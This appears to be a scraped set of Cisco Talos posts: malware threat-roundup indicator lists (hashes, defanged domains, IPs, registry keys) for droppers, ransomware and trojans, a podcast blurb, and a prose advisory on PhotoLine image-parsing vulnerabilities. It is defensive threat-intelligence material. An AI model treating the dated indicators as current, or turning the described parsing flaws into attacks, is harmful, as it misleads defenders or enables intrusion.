• d29a6afc4b35eef25811664369471688a0ecd89fc2a5eb676de9c5518c9914f2
• db4d85d172b31413c1f93162053032a9a2e26b273dfdea8b7506ee8ca982e32f
• f745e3687dabecb07c033a70db4f8c2cb14b9fc75c896304f6e9ed4dc6e3a1ba
• fff6555400d65b28590cdde1a1f1a8731f02e8c21c1a9f167d53dc1054cc865a
• 522a804aeee581c63049d0a5983a558c2a3225c4b14814cf0acb8912b79260d6

Coverage

Screenshots of Detection

AMP

ThreatGrid


Umbrella

---

Doc.Dropper.Agent-6336814-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• acsbaroda[.]com
• a[.]pomf[.]cat
• b[.]reich[.]io
• directlink[.]cz
• nusacitracipta[.]co[.]id
• u[.]teknik[.]io
• wallpaperbekasi[.]co[.]id
• www[.]b-f-v[.]info
• www[.]noosabookkeepers[.]com[.]au
• www[.]powerplusscable[.]com
• www[.]styrenpack[.]com

Files and or directories created

• \Users\Administrator\Documents\20170920\PowerShell_transcript.PC.Pbzg9q9Z.20170920011010.txt
• \TEMP\Quotation_211.xls
• %AppData%\Microsoft\Office\Recent\Quotation_211.LNK
• %AppData%\Microsoft\Office\Recent\277336261.xls.LNK
• %AppData%\Jaty\WebHelper.exe

File Hashes

• 760d89498b3029b1c6fdc5feefa16170589a4b61414c6b1e9d76611031ab0bd5
• 19dc470f8c9a1a4e9e24707b68c43138178e81d4ec74e358941756667633c5b7
• 1d14387de0375c84c8c334fb4d29c8ec4e3c24cd9969bcd3acbb77cb65f77a11
• a80e8da4851eccfad1b8c2b930389a1980dcdab0d193073a4d3dac2d6a0e73d7
• f84e3b79c16a77db33d1f5ee66fa13d15f25fed78d219d77dfe83268650cd944
• d1e2655394e9ffd7f7d502840ace6b0de7369c938abee8c1ddc84dcf73486dd3
• 81b61e9dd4682b079e0b1df3250640c99e0228d4bdcbef5f18bf4bd8fedbff09
• 5af528ce89a31516eb1b5303b0789b56ab64ad16d7d15193c8b24b5ac3ff22a0
• a9fec7f8f911f431dd9934092903974c3206feefac7308f48087ab02fbc24927
• 93a1ddd820a187fd8db5ce8d595958fcfb34ea5c01b5971b359f318f8fe7bb3b
• 4eb507bf63d6273548238a6c7e6831b6b29363c1c37e9176b7c72a6c3faa862d
• cffb8b6c103a443159c94dadd5058c3c083d906600f0db6291ab0e2f4c005b68
• 127cae520479d08e0bfa1b569ace82203cd8154f49f7a8569bfbc54d4c8c6da8
• dfca64bac0dd845e4e0d98a0f0ce3ae235cddf2f6506fabb7923a2d5e0da3129
• c1f97901518b6dab1c4516a7f400430030011c26f52cd429299d4331938b70bd
• c3baeac24f2416d21e64df05b568600c3be76a6365e7cb5b8dbfdfe64ae95c46
• ac535056dcd65160165ad9e53bc5bc4e08b61ce129fb37d7f7b727c4e1a875df
• af9f674bc5a26324b62f8c5a67f256b6133b2ec26a25a7c93564fe048ae4afd4
• 2b06143fffe0099302b2ec0b6f40b5aac115f37c61db32a3be6e0ed13d8eee85
• 2eba0e3bb658230fe8617038b6be0f58d042a8bb13dd4d9169e775263f82eab3
• 304c6f454f0efca218002c12009518c27e63186dd5de57b652cf2d4d14c7f0a4
• b75f01bb44d8a7f402bf01683230ff71138509344bd13d7c199855a321c26b30
• 5b5b1960bb43c0c115080b3393aaa263137141d53f6b173b24f6c08cbe86d2f8
• 51d6c81b77f098af1b463f72d236d44b21d873f3c8360004ac93ba803db620a9
• f4eb5c188028bd80eaf5e822fd6e80e6d2826215e6698668202b72aedabc3daf
• d8b26ec2609f02379d8b8489f0b52f060e1d5f2dea369dbb675c408c29f83401
• 81dea09c54a4f26cc078d1b341d5172ceeb5229861621e99552854c564747c83
• 80c8b5fad0efae1c96e51d97a3ae2ee0e3c9d802691e7178da29b12f23b0f2a0
• 5742ca6839d7b0b6e56f5406fcb744180bc76e81f7ebdc626b432ab3c1b3de81
• c1fb997c7dd23f0bb6f19e20029650fc890beca44fbe2f50e21a001b3aa1d319
• 2159c51a8951b68089524aec9cbb7ba171da57baf733bd12c7d7741d8f17e55b
• bef55fe81de1a2eb2c0a9e647619a483093b031f5c797d5a8e32bb787356e33a
• 7f0a79692fc21938be2f2acab035a56049a9444a8e380d62615546efd0862335
• e618be36548c349562bbdc6c4d68efcb2c86b4354037e9014fd91eea3ec0a0ca
• 100b1db7896fbd9c4415a96aed0383babbc43ac1f6ae589d408d39532ce9125b
• f48ecc2b672bc937370ef812eb1b23e3e76e680a2a96aff2d58af8331eb75cfe
• da2ee40c1fcf98c416132ddf8d4a533f387fcc2214772588bf2ab0967a7d1ede
• b5fd96e20d32e4f805c4b157037b8e382ff2ce3564fad2f5b3d3c7b6247ea1e2
• bfc11420c2e7d86d66ca3c4cd495a47b7882d6abbb7a8cc87a58ce9e3daaacaa
• 5f5e981122a6264042e5b79860200c894538cb134d2c93d3f15750ec9443c7f2
• 76a940a6ef4397c6b7c8d1ba0dca3e891c2d526f58c03c766d041b98a8791e54
• 5056b55b83863c4ac1ed6ee66e4d2dc0de8b56416dd96cf712f5b889aeff5cdf
• f9e29f39b89918fcf26237c5002cd98a2a001c37690720ba537eebd0e72a56cd
• 6264bc92083a561dd31c38fc752589eb7e8dd65fa2b6c792d2dd247b5f63ff98
• 544eac3c9205cc3ecaf57283c823050df3bfe4ce78d0c7e38592ef333cc8bdc8
• dce3ff33424c5e43795ffba7ad33ee8a301606e3c4406e2cd1d07cf6d789ac8e
• 633dd2217d33b8a60f3ca98905bb7119d7d63e8db50525452c5bfe5449b7885d
• 6386f608f5f0fb7007ecf808b9a96048c4fc1fe3c20637332b9da1e5094972c5
• 60d4c6a68368b14ce9aa0b6b3e8eb91e92f823f6524a49e4e7cc265353982898
• 9804648f30f0a4af07a729f3bf0aa2cf23ed4174c8a1a9ffd98694efb3c51e2c

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Doc.Macro.DownloadExe-6336397-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• 66[.]55[.]90[.]17
• 52[.]179[.]17[.]38

Domain Names

• a[.]pomf[.]cat

Files and or directories created

• \TEMP\~$L Receipt.doc
• %TEMP%\CVRFC94.tmp.cvr
• \TEMP\gkmgax.exe
• \TEMP\DHL Receipt.doc
• \srvsvc
• %AppData%\Microsoft\Office\Recent\runme.doc.LNK
• %SystemDrive%\~$runme.doc
• %AppData%\Microsoft\Office\Recent\DHL Receipt.LNK

File Hashes

• 9fa533406df0d2d165f46f37d1167fdb97ff388a5e84b60bfd75921c6f44ff6c
• 74805a5b0a8171f723627c8b061805a6c9c098e7ce1ea83378a774769bc7a1c6
• f861caffda478a4227bf06323ef32407f774274cdacf2e5e23506d67a08cd89c
• 9fa533406df0d2d165f46f37d1167fdb97ff388a5e84b60bfd75921c6f44ff6c
• 0ef4406f5608ad25b4c61d37b6ece1b71c2738814528af550dde14917d2cb4e3
• f8dcc75be0d1354741606663aebb95e477fe1d4e46246e677fc0e414b7dd354f
• 216f09c6eff72fae7d6511a73be7530e80980ff6305e4dd2656c96aec29f242e
• 265de60479b8d8bd46b56a7bec778d6ef9c62a9053e42c6a632d52cdc16a9490

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Doc.Macro.VBSDownloader-6336817-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass

Mutexes

• Global\MTX_MSO_AdHoc1_S-1-5-21-2580483871-590521980-3826313501-500
• Local\ZonesLockedCacheCounterMutex
• Global\MTX_MSO_Formal1_S-1-5-21-2580483871-590521980-3826313501-500
• \BaseNamedObjects\Global\I9B0091C
• RasPbFile
• Local\WinSpl64To32Mutex_e39d_0_3000
• Local\MSCTF.Asm.MutexDefault1
• \BaseNamedObjects\MD99F8B3
• Local\10MU_ACB10_S-1-5-5-0-58054
• Local\ZonesCacheCounterMutex
• Local\10MU_ACBPIDS_S-1-5-5-0-58054
• Global\552FFA80-3393-423d-8671-7BA046BB5906
• \BaseNamedObjects\Global\M9B0091C

IP Addresses

• 50[.]63[.]119[.]1

Domain Names

• lymanite[.]com

Files and or directories created

• %SystemDrive%\~$c69c4b9785cdc861c8fae99998a1ad011cf2e98456a1891bd29bcc990897f0.doc
• \TEMP\gescanntes-Dokument-07170222835.doc
• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24E5C5A3-7CF5-41D8-94C1-47B41F61C27E}.tmp
• %AppData%\Microsoft\Office\Recent\fac69c4b9785cdc861c8fae99998a1ad011cf2e98456a1891bd29bcc990897f0.doc.LNK
• %TEMP%\64388.exe
• %AppData%\Microsoft\Templates\~$Normal.dotm
• \TEMP\~$scanntes-Dokument-07170222835.doc
• %AppData%\Microsoft\Office\Recent\gescanntes-Dokument-07170222835.LNK
• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\42994.exe
• %AppData%\Microsoft\Office\Recent\Local Disk (C).LNK
• %TEMP%\CVR26FE.tmp.cvr
• \Users\Administrator\Documents\20170926\PowerShell_transcript.PC.sJClvqz1.20170926112823.txt

File Hashes

• fac69c4b9785cdc861c8fae99998a1ad011cf2e98456a1891bd29bcc990897f0
• 0274541153434372cb7c0bdc7f55c5b70a48ab0c22907611a89139d2073826bf
• 12b2acf3a81b16850fec270f521ba9b749a340f1357f225e495462822409da12
• 1d1407735650c83e62a561a1ea5cdc798aa1cdc92653f5e722dc8b22b5ed9a7c
• 2b4bbedb5119cd52c44fe035ee5b00b520792db60207ffd6ce3cdc339901346d
• 476e8075ba4866c0a78253dcb19961b28f150aa207d50b575b0d07fdcca4aa13
• 477bbf5395742a4e45331d71c6de3191729fbbf5914457ccfef7eb9d3e8697c7
• 4cfd3f25f178f5ae5dd5c5438a4bc3cd0af2ca712a5a59388612697d4b4424d4
• 5bb5975dd0b781d5fab3721ae66463e64825fccfdcf876bcb8899c2571ed04f4
• 5dc91a43bfcf5f4b4c2a759220e9eacec671bc275572b6feeca274d9c4836829
• 61411a7a585f12f1d3e60eb084e9dac648217b922a3d68ce4024b26a6fcce3cc
• 69b35b1bffd2d36c06d4598de38fa4364e726044623d89bc73fc1e9b31f57e71
• 6c0bf54da7ee15bf99b7ff6be57ee8331d8335a1d15513227c6ada04c841c4de
• 71cc8b291e0a1ad38ed9142eb112f56c4a8a3eb00d130bfa27e5c40a08bc9e43
• 75eb214657020fd9b6f2d533d3c12724cf1de2adbb925d7abfd744e6ff73633d
• 7cc1a551e6060d0e7a38423a2247edd4a84b6cca927f996d2bc056269dedb6e6
• 908b6ea63e3e916377fe0319886bf4b55c7aaddde27292b9dce5930eede5622a
• a2fe92fa39d6b0f9dbfebd83be179524fadb87b11e555eee96c606af7d34ce73
• b6bfdbfcbb5097912ad8bdf9cec2592a162a27b7c367193d1fdd10d9db5182dc
• b7651bd99dda94f6bf962b473872690ee145c38546cd7b3f8bb477976d9a8617
• c77d0bee9502f8d4c3afc1729a7ab9721ffce9bf2b7759d086e436370af4ff5c
• d621d5dea6a95c31650a4c46aaf507625a8e18f33b5a4a22e8a801c25dc77a49
• d919139e4965ad6c55b7f08e2f919aac5fd8deb0fd90cf65f2bd4a4aa5bd2dd8
• d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91
• df5c68270b14d82a523a503a717de1ccfe1739c62956e7a58aa8441f117b7344

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Win.Ransomware.TorrentLocker-6336835-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: etejasix
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyEnable
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: AutoConfigURL
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyOverride
• <HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer
• <HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Mutexes

• \BaseNamedObjects\Global\otydesuxofyjyxufexycaga
• Global\otydesuxofyjyxufexycaga
• \BaseNamedObjects\Global\yjacitumaxicuqexyfitywoqewyquwy
• qazwsxedc
• Global\yjacitumaxicuqexyfitywoqewyquwy

IP Addresses

• N/A

Domain Names

• wrygsxi[.]zotebsca[.]net
• atawgce[.]zotebsca[.]net
• adez[.]zotebsca[.]net
• uluxkqopy[.]zotebsca[.]net
• efedaluc[.]zotebsca[.]net
• mxed[.]zotebsca[.]net
• omywuw[.]zotebsca[.]net
• imjmawfcoja[.]zotebsca[.]net
• evycoroz[.]zotebsca[.]net
• erivequt[.]zotebsca[.]net
• aqyjo[.]zotebsca[.]net
• usuhazepug[.]zotebsca[.]net
• avev[.]zotebsca[.]net
• fhuga[.]zotebsca[.]net
• uqydjnwn[.]zotebsca[.]net
• evehasuruzo[.]zotebsca[.]net
• ypyhi[.]zotebsca[.]net
• epabojyluko[.]zotebsca[.]net
• iqesex[.]zotebsca[.]net
• ywapivuqexe[.]zotebsca[.]net
• ihodi[.]zotebsca[.]net
• rtacin[.]zotebsca[.]net
• aliragifut[.]zotebsca[.]net
• eztcu[.]zotebsca[.]net
• ukajusi[.]zotebsca[.]net
• okypag[.]zotebsca[.]net
• ubapimiwdj[.]zotebsca[.]net

Files and or directories created

• %WinDir%\edaraxoz.exe
• %AppData%\uqetukykopefyvij\02000000
• %AllUsersProfile%\uqetukykopefyvij\02000000
• %AppData%\uqetukykopefyvij\01000000
• %AllUsersProfile%\uqetukykopefyvij\01000000
• %AppData%\uqetukykopefyvij\00000000
• %AllUsersProfile%\uqetukykopefyvij\00000000
• %WinDir%\ukavdnlj.exe

File Hashes

• 1a78a5c1c4ebb8a0047cbb4a8a27782212603d71cae2aeb033bceab76795a294
• 4312486eb32d7edc49d437a598d7e0453e8c9d1222b8b9ba429c73e0598db1a9
• 58f36594d9502e3e8e135d0a449e5c07a62ae6fcd34a32c5c4d9243cb28d958b
• 5c66755aeeed65c21c8d9774baebd79c962311a57b733cb19d4d2bb6a0eb52c3
• ae7a23e9b4c2645c26dce4a83a97953fa5ca008570aa9ac32e0826369593a099
• ba4fe6e91aae42e7a12747422443a361201898a4a5d2454472cf8d42b8d5cc52
• bf795a1676a6dd795fb6915ecfbfdc200687907cae8769c55b9e26328b026f88
• cc07ae7275b177c6882cffce894389383ca2c76af5dc75094453699252c9c831

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Spyware.CCBkdr-6336251-2

Indicators of Compromise

Registry Keys

• <HKLM>\HKLM\SOFTWARE\Piriform\Agomo
• Value: NID
• <HKLM>\HKLM\SOFTWARE\Piriform\Agomo
• Value: TCID
• <HKLM>\HKLM\SOFTWARE\Piriform\Agomo
• Value: MUID

Mutexes

• N/A

IP Addresses

• 216[.]126[.]225[.]148

Domain Names

• N/A

Files and or directories created

• N/A

File Hashes

• 04622bcbeb45a2bd360fa0adc55a2526eac32e4ce8f522eaeb5bee1f501a7d3d
• 1a4a5123d7b2c534cb3e3168f7032cf9ebf38b9a2a97226d0fdb7933cf6030ff
• 30b1dfd6eae2e473464c7d744a094627e5a70a89b62916457e30e3e773761c48
• 53c6ad85a6b0db342ce07910d355dad53765767b4b9142912611ec81bee0f322
• 6f7840c77f99049d788155c1351e1560b62b8ad18ad0e9adda8218b9f432f0a9
• 8562c9bb71391ab40d4e6986836795bcf742afdaff9a936374256056415c5e25
• 8a8485d2ba00eafaad2dbad5fad741a4c6af7a1eedd3010ad3693d128d94afab
• dbf648e5522c693a87a76657e93f4d44bfd8031c0b7587f8b751c110d3a6e09f
• 07fb252d2e853a9b1b32f30ede411f2efbb9f01e4a7782db5eacf3f55cf34902
• 128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f
• 27a098761e8fbf4f0a7587adeee8eb787c0224b231b3891fa9323d4a9831f7e5
• 2bc2dee73f9f854fe1e0e409e1257369d9c0a1081cf5fb503264aa1bfe8aa06f
• 2c020ffa3436a69a1b884b5b723909c095e5e58406439287ac4c184a3c3c7da7
• 76cd0370af69d5c76e08673976972fee53764fca67f86fcf0db208b87b7341d6
• 8038ea1b72a720f86397fd2ee1f386bb832e5cbd8e12f97e11e0c787bde9e47e
• dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83
• e8e02191c1b38c808d27a899ac164b3675eb5cadd3a8907b0ffa863714000e72
• f0d1f88c59a005312faad902528d60acbf9cd5a7b36093db8ca811f763e1292a

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Win.Trojan.Beeldeb-6336738-0

Indicators of Compromise

Registry Keys

• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2

Mutexes

• \BaseNamedObjects\hTGfNaKIQ4lPz

IP Addresses

• 41[.]45[.]138[.]91
• 156[.]203[.]64[.]64

Domain Names

• microsoft[.]net[.]linkpc[.]net

Files and or directories created

• %TEMP%\EqEhol.exe
• %TEMP%\JTVxon.txt
• %TEMP%\NJiSUL
• %AppData%\njisul\NJiSUL
• %AppData%\njisul\EqEhol.exe
• %AppData%\njisul\fXMlDZ.exe
• %AppData%\njisul\JTVxon.txt
• %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\gmail.lnk

File Hashes

• bb8e4aec824aa052fdda739abb8472caf2bd6c34d1773248ea3072e5c024140a
• 2c89cbab497a1a5219b5d66f1ba39473b6ffc15ec4f53a2bb09c070a15a537e8
• 36e92852d67e66cb3c99312f107f83080605c2badf787108f619d6b54e6c85fc
• 1e76a00a1e6e4265ad5ff364d3139a62013a9628d90edd7e6a155e7f0a8193e8
• 07de12cf4c78151a0bdd6d8dcf8b5d0b91f51b606fd8ec0774e54fcb16e3440a
• e15dc2879dccd3c62d77169fe77d869455e61e2706006da829013d55b42107ba
• ca07844200067101a91d23604a7fb425ee8b47a66567a953103a9949f66d74cc
• c4cf29d4e6a6b905e08534108ab07318d5704d91df50c9d5477b998a19395eff
• a864f592f8fd01a57cf8302056a413e4a688f6cfa2beae8c5e136a40384f7b56
• eea366f807de6e4a0834e9fcf8dc0847b7ab4707314191448950a22cc0dbfa76

Coverage

Screenshots of Detection

AMP

ThreatGrid

---

Win.Trojan.Cossta-237

Indicators of Compromise

Registry Keys

• <HKLM>\SYSTEM\ControlSet001\Services\Alerter

Mutexes

• \BaseNamedObjects\44-41

IP Addresses

• N/A

Domain Names

• wenrou88[.]3322[.]org

Files and or directories created

• %SystemDrive%\Program Files\Microsoft Explorer\AAA.exe

File Hashes

• e8feccbab518346c0ec9ea3787f3b09994e41ca278aa537bc753fa1d6b40d1c4
• b955412a8b6ec7d48b70bc2ed05226755c2b418a075fd0e3f98ba52086caa495
• de37309306863d4a1b6f12a9c6e047fd93a9645f8acdbcc2f36f65d00226af2d
• 2e3b79c0bc90f46218700afba5d5a55cb00832969a00f254ec113d342d76a992
• 38a58d5c41f91b483ae727e922039848e14410c485db577cd0e21ee28e8fa250
• 424e36fd9975a43f25fad06e0282833d1280bcd9e6d5ef8221dc322fd16fbaa0
• 83062a56de8404db9311d60c87cccc4c25a8887952e695e5ffa0ac2600606706
• 94bc3ce60f0750456467c4262543e1196eb8a3294fcd79441ef7250e8fdf7885
• 5ed30bc2f7412875ccba2ade6e124154eda0788d555978ab6b60a69dbdf0bac1
• f81a1362894fa49b7008cffe93365ef2158180be9a935ae17acc2bafa8f983d9
• 6e678b7d3a7a46f20a19079644f0d879f03b1cad83e441ca64a4c0d1076d9ebb
• f9e9a3d7b7bffae8cda1b3ff4c893933eff386b26fd035fa4bb61c7c31bf2690
• 53c7cececf2d29386f3184e588c5a0ec558292ff227891d3ce5605f82a5f9688
• dfbafa207c90d3d4e20dabe7620f901e1abe30fa0fa4dd06bfabe852f8f1f0bc

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Worm.Untukmu-5949608-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\INSTALLER
• Value: DisableMSI
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: System Monitoring
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
• Value: NoFolderOptions
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
• Value: DisableCMD
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
• Value: DisableRegistryTools
• <HKCU>\CONTROL PANEL\DESKTOP
• Value: ScreenSaveTimeOut
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CABINETSTATE
• Value: FullPathAddress
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: xk
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE
• Value: DisableConfig
• <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT
• Value: AlternateShell
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\AEDEBUG
• Value: Debugger
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\INSTALLER
• Value: LimitSystemRestoreCheckpointing
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
• Value: Userinit
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: internat.exe
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
• Value: DisableRegistryTools
• <HKCU>\CONTROL PANEL\DESKTOP
• Value: SCRNSAVE.EXE
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\AEDEBUG
• Value: Auto
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE
• Value: DisableSR
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
• Value: HideFileExt
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
• Value: ShowSuperHidden
• <HKCU>\CONTROL PANEL\DESKTOP
• Value: ScreenSaverIsSecure
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: MSMSGS
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: LogonAdministrator
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
• Value: Hidden
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
• Value: CheckSetting
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
• Value: Shell
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
• Value: NoFolderOptions
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: ServiceAdministrator
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\System\
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\
• <HKLM>\SOFTWARE\CLASSES\lnkfile\shell\open\command
• <HKCU>\Control Panel\Desktop\
• <HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\SystemRestore
• <HKLM>\SOFTWARE\CLASSES\batfile\shell\open\command
• <HKCU>\Software\Policies\Microsoft\Windows\System\
• <HKLM>\SOFTWARE\CLASSES\piffile\shell\open\command
• <HKLM>\SYSTEM\CurrentControlSet\Control\SafeBoot\
• <HKLM>\SOFTWARE\CLASSES\LNKFILE\SHELL\open
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug
• <HKLM>\SOFTWARE\CLASSES\lnkfile
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Run\
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
• <HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\Installer
• <HKLM>\SOFTWARE\CLASSES\exefile
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon
• <HKLM>\SOFTWARE\CLASSES\exefile\shell\open\command
• <HKLM>\SOFTWARE\CLASSES\LNKFILE\shell
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\System\
• <HKLM>\SOFTWARE\CLASSES\comfile\shell\open\command

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• %System32%\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
• %WinDir%\setupact.log
• %System32%\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
• %System32%\wdi\LogFiles\BootCKCL.etl
• %WinDir%\Tasks\SCHEDLGU.TXT
• %System32%\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-2580483871-590521980-3826313501-500_UserData.bin
• %System32%\wfp\wfpdiag.etl

File Hashes

• 9e0419794e2d948623f74a1443a553946334beaaa1c902ddc2741b1586a3bd89
• 6735181a112e87550dba81d667012250ff78959cdfe4852043c35895a4a53635
• fdb82a1a0c8b84d22d87e373d37a09cbbee481eca77a695f0a42b0ce8e7d15fb
• 1c3d3774371a96d8dac17ef186e1d10e6520fc82d9325974f4191d437bfa106a
• c7e85bc2b8120dec204e5592ab9254e90030cf3a13a2281d047c1d0bcb878d10

Coverage

Screenshots of Detection

AMP

ThreatGrid

Beers with Talos (BWT) Podcast Episode 14 is now available.  Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

EP14 Show Notes: 

We haven’t gone around the table and introduced ourselves in some time (about 50k downloads ago), so we take the time we usually complain about things at the top of the show to do that.

We have seen a massive amount of “top-tier” threats in the last six months or so. While it might seem like comparing apples and oranges (hint: it is), the crew takes a stab at ranking these recent threats/attacks: CCleaner, Deloitte, Equifax, Nyetya, SEC, Shamoon2, WannaCry. Shockingly, all of us have a different ranking. What’s your list look like?

These vulnerabilities are discovered by Piotr Bania of Cisco Talos.

Today, Talos is releasing details of multiple vulnerabilities discovered within the Computerinsel GmbH PhotoLine image processing software. PhotoLine, developed by Computerinsel GmbH, is a well established raster and vector graphics editor for Windows and Mac OS X that can also be used for desktop publishing.

TALOS-2017-0387 (CVE-2017-2880). TALOS-2017-0427 (CVE-2017-2920) and TALOS-2017-0458 (CVE-2017-12106) may allow an attacker to execute arbitrary code remotely on the vulnerable system when a specially crafted image file is opened by the PhotoLine image processing software.

Technical details

TALOS-2017-0387

An attacker may be able to manipulate GIF content to control a counter variable that controls memory writes, and cause PhotoLine to overflow memory, potentially resulting in a remote code execution.

Specifically, a short byte value is read from a GIF file from which the variable counter is calculated in the vulnerable code of PhotoLine and used in a memory loop containing memory write instructions. Further details can be found here.

Graphics Interchange Format image files are universally used and are one of the most popular image formats today on the internet.

TALOS-2017-0427

During the parsing of SVG files, memset function is executed with a size parameter that can be controlled by attacker. Specifically, the size parameter is calculated from the SVG path's D attribute which is a string containing a series of path descriptions that could be manipulated. The bug requires the feGaussianBlur filter to be attached to the path style. Further details can be found here.

Scalable Vector Graphics image files are often used and are one of the popular image formats today on the internet, with support for interactivity and animation. All major web browsers support rendering of SVG files.

TALOS-2017-0458

Truevision TGA, often referred to as TARGA, is a raster graphics file format developed in the early eighties and was one of the most commonly used graphical formats in first personal computers. The format is still in use today.

A memory corruption vulnerability exists in the TGA parsing functionality of Computerinsel GmbH Photoline. A specially crafted TGA file can cause a vulnerability resulting in potential code execution. An attacker can send specific TGA file to trigger this vulnerability. Further details can be found here.

Although these vulnerabilities specifically affect Computerinsel PhotoLine image editing software, users of other popular image editing programs are recommended to install latest updates in order to make sure that they are running the latest program versions, which likely contain the fewest number of security vulnerabilities.

Affected versions

The vulnerability has been confirmed in Computerinsel GmbH PhotoLine version 20.02 but it may also exists in previous versions. The vendor has released an updated version of software which can be downloaded from here.

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

